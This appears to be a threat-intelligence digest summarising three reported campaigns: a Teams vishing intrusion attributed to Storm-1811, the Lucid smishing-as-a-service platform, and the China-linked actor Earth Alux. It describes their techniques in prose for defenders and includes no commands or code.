Update: Teams Vishing Campaign Shifts Toward Persistence and Stealth
A recent intrusion analyzed by Ontinue’s Cyber Defense Centre demonstrates the continued evolution of Teams-based vishing campaigns, first observed in late 2024 and previously linked to Storm-1811. In this case, attackers-initiated contact through Microsoft Teams messages and vishing calls to guide users into running a PowerShell command. This command downloaded a payload that served as the entry point for a larger attack chain. Once initial access was secured, Quick Assist was used to establish remote control, followed by the silent deployment of a signed TeamViewer executable. The attackers then sideloaded a malicious DLL (TV.dll) into the trusted binary to blend into legitimate system processes. This sideloading technique has become a core part of the group’s playbook, allowing them to remain active without drawing attention from typical monitoring tools. To maintain access, the attackers dropped a shortcut into the startup folder and leveraged Background Intelligent Transfer Service (BITS) jobs to silently move files over extended periods. A second-stage backdoor, written in JavaScript and executed via Node.js, provided long-term command-and-control through socket connections. These methods reflect a clear shift from quick-hit payload delivery to long-term persistence, using built-in Windows features and signed binaries to minimize detection. The overall approach is consistent with earlier campaigns we documented involving Storm-1811, but this instance shows greater emphasis on stealth and durability. It highlights the ongoing risk of social engineering, where attackers bypass technical defenses by targeting human trust, and reinforces that common tools—when misused—remain some of the most dangerous elements in the threat landscape.
Update: Lucid PhaaS Elevates Global Smishing With Encrypted Messaging and Device Farms
We previously documented Darcula, a phishing-as-a-service (PhaaS) platform that leveraged similar tactics, and Lucid now emerges as a parallel—but more mobile-focused—operation with its own infrastructure and delivery methods. Operated by the Chinese-speaking 'XinXin group' since mid-2023, Lucid enables cybercriminals to carry out high-volume phishing campaigns through encrypted messaging services like iMessage and Rich Communication Services (RCS), avoiding traditional spam filtering. Victims receive geo-targeted smishing lures impersonating logistics companies, tax agencies, toll systems, or banks. These messages link to professionally designed phishing pages that capture sensitive data, including payment details. A built-in credit card validator ensures real-time utility of stolen credentials, making fraud or resale instant and profitable. The campaign’s use of end-to-end encrypted delivery, regional customization, and adaptive branding demonstrates a shift toward mobile-first, infrastructure-light phishing that’s harder to monitor and disrupt at scale. Lucid is sold via Telegram under a weekly subscription model and grants access to over 1,000 phishing domains and auto-generated phishing sites. The platform runs on large-scale iOS and Android device farms that use temporary Apple IDs and exploit weak points in RCS implementations to bypass sender validation. Video evidence shows actors launching these campaigns from moving vehicles—an operational security tactic doubling as advertising for how simple the platform is to use. This "gamification" of phishing lowers the barrier for entry-level cybercriminals while maintaining professional-grade results. The campaign’s precision and reliance on trusted mobile infrastructure align with a broader trend of phishing toolkits becoming modular, portable, and increasingly protocol-aware. With targeted operations now spanning 88 countries and at least 169 organizations, Lucid reflects how PhaaS has matured into a global commodity—fast, scalable, and dangerously easy to use.
Earth Alux: Emerging China-Linked Threat Actor Targets APAC and LATAM with Evasive Malware
Earth Alux is a newly identified China-linked threat actor that has steadily expanded its reach across Asia-Pacific and Latin America since mid-2023. Initially observed targeting government and enterprise infrastructure in Thailand, Taiwan, and Malaysia, the group has since extended operations into Brazil and other Latin American nations. Its attacks begin with exploiting vulnerable, internet-facing web applications used to deploy the Godzilla web shell. This foothold allows Earth Alux to drop a suite of stealthy, modular malware, including two key backdoors: VARGEIT and COBEACON. VARGEIT stands out for its ability to load tools into processes like Microsoft Paint, enabling fileless reconnaissance and data exfiltration. In contrast, COBEACON—based on Cobalt Strike—is deployed earlier in the infection chain via loaders like MASQLOADER or RSBINJECT. The group’s malware ecosystem includes additional components like RAILLOAD and RAILSETTER, which are designed for persistence and timestomping, and deployed using DLL side-loading to remain covert. Earth Alux’s operations are marked by aggressive evasion tactics, including anti-hooking techniques that modify NTDLL.dll to bypass endpoint detection. VARGEIT is particularly versatile, supporting ten communication channels including DNS, ICMP, HTTP, and Microsoft Outlook via Graph API, where commands are exchanged using the drafts folder of attacker-controlled mailboxes. The group uses open-source Chinese tools like ZeroEye and VirTest to test for side-loadable executables and to validate that their malware remains undetectable. Earth Alux's continued development and deployment of these tools reflect an advanced and persistent cyber-espionage operation focused on long-term access, lateral movement, and stealth—positioning them as a serious and adaptive threat actor.
